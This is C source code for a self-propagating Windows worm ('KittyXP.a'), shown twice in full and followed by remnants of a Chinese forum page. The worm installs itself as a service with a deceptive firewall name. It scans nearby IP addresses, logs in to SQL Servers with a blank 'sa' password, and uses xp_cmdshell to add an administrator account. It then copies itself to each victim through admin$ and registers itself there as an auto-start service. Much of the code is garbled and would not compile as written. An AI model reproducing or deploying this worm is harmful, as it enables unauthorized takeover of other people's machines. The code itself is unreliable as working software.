CODE:
#include <stdio.h>
#include <windows.h>
#include <winsvc.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>
#include <winsock2.h>
#include <shellapi.h>
#define ServiceName "Microsoft NetWork Services FireWall";//欺骗对方
char RemoteFilePath[128]={0};
bool ConnIPC(char *RemoteName,char *User,char *Pass);// ipc$的连接
long GetLocalIP(void);//获得本机IP
DWORD WINAPI Sqlcmd(LPVOID lp);//sqlcmd?//you know the meaning
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow);
SERVICE_STATUS_HANDLE ssh;
SERVICE_STATUS ss;
/
void ServiceStopped(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_STOPPED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
void ServicePaused(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_PAUSED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
void ServiceRunning(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_RUNNING;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
void WINAPI servier_ctrl(DWORD Opcode)//服务控制程序
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP://停止Service
ServiceStopped();
break;
case SERVICE_CONTROL_INTERROGATE:
SetServiceStatus(ssh,&ss);
break;
}
return;
}
//
//杀进程成功设置服务状态为SERVICE_STOPPED
//失败设置服务状态为SERVICE_PAUSED
//
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
ssh=RegisterServiceCtrlHandler(ServiceName,servier_ctrl);
if(!ssh)
{
ServicePaused();
return;
}
ServiceRunning();
Sleep(100);
WinMain;
return;
}
/
void main(DWORD dwArgc,LPTSTR *lpszArgv)
{
SERVICE_TABLE_ENTRY ste[2];
ste[0].lpServiceName=ServiceName;
ste[0].lpServiceProc=ServiceMain;
ste[1].lpServiceName=NULL;
ste[1].lpServiceProc=NULL;
StartServiceCtrlDispatcher(ste);
WinMain;
return;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
int a=2
HANDLE hThread=NULL;
DWORD dwThreadID;
long PreviousCount;
HKEY KittyXPaInstallKey,KittyXPaNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",0,KEY_ALL_ACCESS,&KittyXPaInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,"//ssrv.exe")
CopyFile(svFileName,systemdir,false)
RegCreateKey(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",&KittyXPaNewKey);
RegCloseKey(KittyXPaNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;//IP段开始
int StopHost;//IP段结束
WSADATA wsaData;
struct in_addr host;
WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{
host.S_un.S_addr = inet_addr(argv[1]);
WSAStartup(0x202, &wsaData );
hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{
//printf("/nCreateSemaphore failed:%d",GetLastError());
//file://__leave;
}
for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,sqlcmd,(LPVOID)i,0,&dwThreadID);
if((hThread==NULL)
{
//printf("/nCreate thread failed:%d",GetLastError());
break;
}
//printf(".");
Sleep(10);
CloseHandle(hThread);
WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
//printf("/nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
//printf("/nAll done.");
break;
}
Sleep(500);
}
CloseHandle(hSemaphore);
WSACleanup();
}
while(a=2);//死循环
return 0;
}
long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf("%s/n",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
//printf("%s/n",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}
DWORD WINAPI sqlcmd(LPVOID lp)
{
SQLCHAR Host[512]="";
SQLCHAR *User=";UID=sa";
SQLCHAR *Pass=";PWD=";
SQLCHAR *Database="";
SQLCHAR InConnectionString[1025]="";
SQLCHAR rowBuff[200]="";
SQLINTEGER iRowBuff;
UCHAR Query[1500]="";
UCHAR Cmd[300]="";
char inBuff[1025]="";
SQLRETURN nResult;
SWORD sLen;
SQLHDBC hDbc;
HSTMT hStmt;
SQLHANDLE hEnvironment;
int retries = 0;
memset(Query,0,1499);
strcpy(Host,lp);
sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}
if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
//printf("SQLSetEnvAttr returned an error!/n");
return 0;
}
if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}
while(retries < 4)
{
nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
strlen(InConnectionString),
inBuff, 1024, &sLen,
SQL_DRIVER_COMPLETE_REQUIRED);
if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Ok.You have connected to MASTER database.../n");
SQLAllocStmt(hDbc,&hStmt);
break;
}
else
{
if(retries == 3)
{
//printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
"If you are using dial-up connection retry for a few times./n"
"If you are sure that SQL server is installed on the target check that port 1433 is open./n"
"If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
"Get a SQL server brute force cracker , try to hack passwords and try again./n"
"If you are a script kiddy then go ( www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");
return 0;
}
retries++;
//printf("Performing retry(%d).../n",retries);
Sleep(5000);
}
}
memset(cmd,0,300);
strcpy(cmd,"cmd /c net user ");
lstrcat(cmd,GetLocalIP());
lstrcat(cmd," 123 /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
//printf("Trying to execute %s on the target/n",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
while (nResult != SQL_ERROR)
{
memset(Query,0,1499);
memset(cmd,0,300);
strcpy(cmd,"cmd /c net localgroup administrators ");
lstrcat(cmd,GetLocalIP());
lstrcat(cmd," /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
memset(rowBuff,0,99);
nResult = SQLFetch(hStmt);
if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Error while fething the results from the stored proc./n");
}
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){
SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
//printf("%s /n",rowBuff);
} else
{
break;
}
}
SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);
if(ConnIPC((char*)lp,(char*)GetLocalIP(),123))
{
memset(RemoteFilePath,0,sizeof(RemoteFilePath));
HMODULE g_module=NULL ;
char svFileName[512];
g_module=GetModuleHandle(NULL);
GetModuleFileName(g_module,svFileName,512);
lstrcat(RemoteFilePath,"");
lstrcat(RemoteFilePath,(char*)lp);
lstrcat(RemoteFilePath,"//admin$//system32//");
lstrcat(RemoteFilePath,"stg.exe");
CopyFile(svFileName,RemotFilePath,false);
bool bRet=FALSE;
SERVICE_STATUS ssStatus;
SC_HANDLE hSCManager=NULL,hSCService=NULL;
__try
{
//Open Service Control Manager on Local or Remote machine
hSCManager=OpenSCManager((char*)lp,NULL,SC_MANAGER_ALL_ACCESS);
if(hSCManager==NULL)
{
//printf("/nOpen Service Control Manage failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service Control Manage ok!");
//Create Service
hSCService=CreateService(hSCManager,// handle to SCM database
ServiceName,// name of service to start
ServiceName,// display name
SERVICE_ALL_ACCESS,// type of access to service
SERVICE_WIN32_OWN_PROCESS,// type of service
SERVICE_AUTO_START,// when to start service
SERVICE_ERROR_IGNORE,// severity of service failure
"stg.EXE",// name of binary file
NULL,// name of load ordering group
NULL,// tag identifier
NULL,// array of dependency names
NULL,// account name
NULL);// account password
//create service failed
if(hSCService==NULL)
{
//如果服务已经存在,那么则打开
if(GetLastError()==ERROR_SERVICE_EXISTS)
{
//printf("/nService %s Already exists",ServiceName);
//open service
hSCService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
if(hSCService==NULL)
{
//printf("/nOpen Service failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service %s ok!",ServiceName);
}
else
{
//printf("/nCreateService failed:%d",GetLastError());
return 0;
}
}
//create service ok
else
{
//printf("/nCreate Service %s ok!",ServiceName);
}
// 起动服务
if (StartService(hSCService,0,null))
{
//printf("/nStarting %s.", ServiceName);
Sleep(20);//时间最好不要超过100ms
while( QueryServiceStatus(hSCService, &ssStatus ) )
{
if ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
//printf(".");
Sleep(20);
}
else
break;
}
if ( ssStatus.dwCurrentState != SERVICE_RUNNING )
//printf("/n%s failed to run:%d",ServiceName,GetLastError());
}
else if(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING)
{
//printf("/nService %s already running.",ServiceName);
}
else
{
//printf("/nStart Service %s failed:%d",ServiceName,GetLastError());
return 0;
}
bRet=TRUE;
}//enf of try
__finally
{
WNetCancelConnection2((char*)(""&lp&"//IPC$"),CONNECT_UPDATE_PROFILE,TRUE);
return bRet;
}
}
return 0;
}
bool ConnIPC(char *RemoteName,char *User,char *Pass)
{
NETRESOURCE nr;
char RN[50]="";
strcat(RN,RemoteName);
strcat(RN,"//ipc$");
nr.dwType=RESOURCETYPE_ANY;
nr.lpLocalName=NULL;
nr.lpRemoteName=RN;
nr.lpProvider=NULL;
if(WNetAddConnection2(&nr,Pass,User,FALSE)==NO_ERROR)
return TRUE;
else
return FALSE;
}
#include <stdio.h>
#include <windows.h>
#include <winsvc.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>
#include <winsock2.h>
#include <shellapi.h>
#define ServiceName "Microsoft NetWork Services FireWall";//欺骗对方
char RemoteFilePath[128]={0};
bool ConnIPC(char *RemoteName,char *User,char *Pass);// ipc$的连接
long GetLocalIP(void);//获得本机IP
DWORD WINAPI Sqlcmd(LPVOID lp);//sqlcmd?//you know the meaning
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow);
SERVICE_STATUS_HANDLE ssh;
SERVICE_STATUS ss;
/
void ServiceStopped(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_STOPPED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
void ServicePaused(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_PAUSED;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
void ServiceRunning(void)
{
ss.dwServiceType=SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS;
ss.dwCurrentState=SERVICE_RUNNING;
ss.dwControlsAccepted=SERVICE_ACCEPT_STOP;
ss.dwWin32ExitCode=NO_ERROR;
ss.dwCheckPoint=0;
ss.dwWaitHint=0;
SetServiceStatus(ssh,&ss);
return;
}
/
void WINAPI servier_ctrl(DWORD Opcode)//服务控制程序
{
switch(Opcode)
{
case SERVICE_CONTROL_STOP://停止Service
ServiceStopped();
break;
case SERVICE_CONTROL_INTERROGATE:
SetServiceStatus(ssh,&ss);
break;
}
return;
}
//
//杀进程成功设置服务状态为SERVICE_STOPPED
//失败设置服务状态为SERVICE_PAUSED
//
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
ssh=RegisterServiceCtrlHandler(ServiceName,servier_ctrl);
if(!ssh)
{
ServicePaused();
return;
}
ServiceRunning();
Sleep(100);
WinMain;
return;
}
/
void main(DWORD dwArgc,LPTSTR *lpszArgv)
{
SERVICE_TABLE_ENTRY ste[2];
ste[0].lpServiceName=ServiceName;
ste[0].lpServiceProc=ServiceMain;
ste[1].lpServiceName=NULL;
ste[1].lpServiceProc=NULL;
StartServiceCtrlDispatcher(ste);
WinMain;
return;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
int a=2
HANDLE hThread=NULL;
DWORD dwThreadID;
long PreviousCount;
HKEY KittyXPaInstallKey,KittyXPaNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",0,KEY_ALL_ACCESS,&KittyXPaInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,"//ssrv.exe")
CopyFile(svFileName,systemdir,false)
RegCreateKey(HKEY_LOCAL_MACHINE,"Software//KittyXP.a//Install",&KittyXPaNewKey);
RegCloseKey(KittyXPaNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;//IP段开始
int StopHost;//IP段结束
WSADATA wsaData;
struct in_addr host;
WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{
host.S_un.S_addr = inet_addr(argv[1]);
WSAStartup(0x202, &wsaData );
hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{
//printf("/nCreateSemaphore failed:%d",GetLastError());
//file://__leave;
}
for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,sqlcmd,(LPVOID)i,0,&dwThreadID);
if((hThread==NULL)
{
//printf("/nCreate thread failed:%d",GetLastError());
break;
}
//printf(".");
Sleep(10);
CloseHandle(hThread);
WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
//printf("/nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
//printf("/nAll done.");
break;
}
Sleep(500);
}
CloseHandle(hSemaphore);
WSACleanup();
}
while(a=2);//死循环
return 0;
}
long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf("%s/n",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
//printf("%s/n",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}
DWORD WINAPI sqlcmd(LPVOID lp)
{
SQLCHAR Host[512]="";
SQLCHAR *User=";UID=sa";
SQLCHAR *Pass=";PWD=";
SQLCHAR *Database="";
SQLCHAR InConnectionString[1025]="";
SQLCHAR rowBuff[200]="";
SQLINTEGER iRowBuff;
UCHAR Query[1500]="";
UCHAR Cmd[300]="";
char inBuff[1025]="";
SQLRETURN nResult;
SWORD sLen;
SQLHDBC hDbc;
HSTMT hStmt;
SQLHANDLE hEnvironment;
int retries = 0;
memset(Query,0,1499);
strcpy(Host,lp);
sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}
if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
//printf("SQLSetEnvAttr returned an error!/n");
return 0;
}
if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
{
//printf("SQLAllocHandle returned an error!/n");
return 0;
}
while(retries < 4)
{
nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
strlen(InConnectionString),
inBuff, 1024, &sLen,
SQL_DRIVER_COMPLETE_REQUIRED);
if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Ok.You have connected to MASTER database.../n");
SQLAllocStmt(hDbc,&hStmt);
break;
}
else
{
if(retries == 3)
{
//printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
"If you are using dial-up connection retry for a few times./n"
"If you are sure that SQL server is installed on the target check that port 1433 is open./n"
"If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
"Get a SQL server brute force cracker , try to hack passwords and try again./n"
"If you are a script kiddy then go ( www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");
return 0;
}
retries++;
//printf("Performing retry(%d).../n",retries);
Sleep(5000);
}
}
memset(cmd,0,300);
strcpy(cmd,"cmd /c net user ");
lstrcat(cmd,GetLocalIP());
lstrcat(cmd," 123 /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
//printf("Trying to execute %s on the target/n",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
while (nResult != SQL_ERROR)
{
memset(Query,0,1499);
memset(cmd,0,300);
strcpy(cmd,"cmd /c net localgroup administrators ");
lstrcat(cmd,GetLocalIP());
lstrcat(cmd," /add/r/n");
Cmd[strlen(Cmd)-1]='/0';
sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
{
//printf("An error occured while performing your query."
"This does not mean that your command is unsuccesfull.../n"
"Check the result.If it didnt work then /n"
"make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
return 0;
}
memset(rowBuff,0,99);
nResult = SQLFetch(hStmt);
if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
{
//printf("Error while fething the results from the stored proc./n");
}
if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){
SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
//printf("%s /n",rowBuff);
} else
{
break;
}
}
SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);
if(ConnIPC((char*)lp,(char*)GetLocalIP(),123))
{
memset(RemoteFilePath,0,sizeof(RemoteFilePath));
HMODULE g_module=NULL ;
char svFileName[512];
g_module=GetModuleHandle(NULL);
GetModuleFileName(g_module,svFileName,512);
lstrcat(RemoteFilePath,"");
lstrcat(RemoteFilePath,(char*)lp);
lstrcat(RemoteFilePath,"//admin$//system32//");
lstrcat(RemoteFilePath,"stg.exe");
CopyFile(svFileName,RemotFilePath,false);
bool bRet=FALSE;
SERVICE_STATUS ssStatus;
SC_HANDLE hSCManager=NULL,hSCService=NULL;
__try
{
//Open Service Control Manager on Local or Remote machine
hSCManager=OpenSCManager((char*)lp,NULL,SC_MANAGER_ALL_ACCESS);
if(hSCManager==NULL)
{
//printf("/nOpen Service Control Manage failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service Control Manage ok!");
//Create Service
hSCService=CreateService(hSCManager,// handle to SCM database
ServiceName,// name of service to start
ServiceName,// display name
SERVICE_ALL_ACCESS,// type of access to service
SERVICE_WIN32_OWN_PROCESS,// type of service
SERVICE_AUTO_START,// when to start service
SERVICE_ERROR_IGNORE,// severity of service failure
"stg.EXE",// name of binary file
NULL,// name of load ordering group
NULL,// tag identifier
NULL,// array of dependency names
NULL,// account name
NULL);// account password
//create service failed
if(hSCService==NULL)
{
//如果服务已经存在,那么则打开
if(GetLastError()==ERROR_SERVICE_EXISTS)
{
//printf("/nService %s Already exists",ServiceName);
//open service
hSCService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
if(hSCService==NULL)
{
//printf("/nOpen Service failed:%d",GetLastError());
return 0;
}
//printf("/nOpen Service %s ok!",ServiceName);
}
else
{
//printf("/nCreateService failed:%d",GetLastError());
return 0;
}
}
//create service ok
else
{
//printf("/nCreate Service %s ok!",ServiceName);
}
// 起动服务
if (StartService(hSCService,0,null))
{
//printf("/nStarting %s.", ServiceName);
Sleep(20);//时间最好不要超过100ms
while( QueryServiceStatus(hSCService, &ssStatus ) )
{
if ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
//printf(".");
Sleep(20);
}
else
break;
}
if ( ssStatus.dwCurrentState != SERVICE_RUNNING )
//printf("/n%s failed to run:%d",ServiceName,GetLastError());
}
else if(GetLastError()==ERROR_SERVICE_ALREADY_RUNNING)
{
//printf("/nService %s already running.",ServiceName);
}
else
{
//printf("/nStart Service %s failed:%d",ServiceName,GetLastError());
return 0;
}
bRet=TRUE;
}//enf of try
__finally
{
WNetCancelConnection2((char*)(""&lp&"//IPC$"),CONNECT_UPDATE_PROFILE,TRUE);
return bRet;
}
}
return 0;
}
bool ConnIPC(char *RemoteName,char *User,char *Pass)
{
NETRESOURCE nr;
char RN[50]="";
strcat(RN,RemoteName);
strcat(RN,"//ipc$");
nr.dwType=RESOURCETYPE_ANY;
nr.lpLocalName=NULL;
nr.lpRemoteName=RN;
nr.lpProvider=NULL;
if(WNetAddConnection2(&nr,Pass,User,FALSE)==NO_ERROR)
return TRUE;
else
return FALSE;
}
2595
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
